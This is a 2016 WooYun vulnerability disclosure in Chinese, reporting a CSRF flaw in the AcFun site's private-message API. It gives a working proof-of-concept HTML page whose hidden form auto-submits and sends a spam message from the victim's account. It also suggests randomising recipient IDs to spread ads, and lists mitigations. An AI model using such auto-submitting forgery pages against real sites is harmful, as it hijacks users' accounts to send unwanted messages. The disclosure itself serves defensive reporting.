当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167843

漏洞标题:A站CSRF漏洞第二弹之点链接发私信

相关厂商:广州弹幕网络科技有限公司北京分公司

漏洞作者: lex1993

提交时间:2016-01-07 13:37

修复时间:2016-01-12 13:38

公开时间:2016-01-12 13:38

漏洞类型:CSRF

危害等级:中

自评Rank:6

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-07: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

发送私信的时候毫无验证

详细说明:

很简单的漏洞,直接给出代码:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<form action="http://www.acfun.tv/api/mail.aspx?name=newMail" method="POST" id="form">
<input type="hidden" name="userId" value="3062288" />
<input type="hidden" name="content" value="想要更多你懂的资源,请访问:http://127.0.0.1/test/sign.html" />
</form>
<script>document.getElementById("form").submit();</script>
</body>
</html>


点击链接之后私信就发送出去了:

7.jpg


上述代码可以改成随机选择用户id,将链接传播出去之后就可以以不同的身份给不同的用户发广告之类的了。

漏洞证明:

见详细说明

修复方案:

验证Origin
使用anti CSRF token等

版权声明:转载请注明来源 lex1993@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-12 13:38

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-12 14:57 | GreatPig ( 路人 | Rank:2 漏洞数:1 | 渗透测试)

    想要更多你懂的资源,请访问:http://127.0.0.1/test/sign.html感觉你本地好多资源啊,吓得厂商,怒忽视

  2. 2016-01-12 15:35 | lex1993 ( 路人 | Rank:13 漏洞数:7 | ®国家战略忽悠局指定白帽子 | WooYun认证...)

    @GreatPig 我只是举个栗子(⊙﹏⊙)

  3. 2016-01-12 16:51 | GreatPig ( 路人 | Rank:2 漏洞数:1 | 渗透测试)

    @lex1993 画面感太强了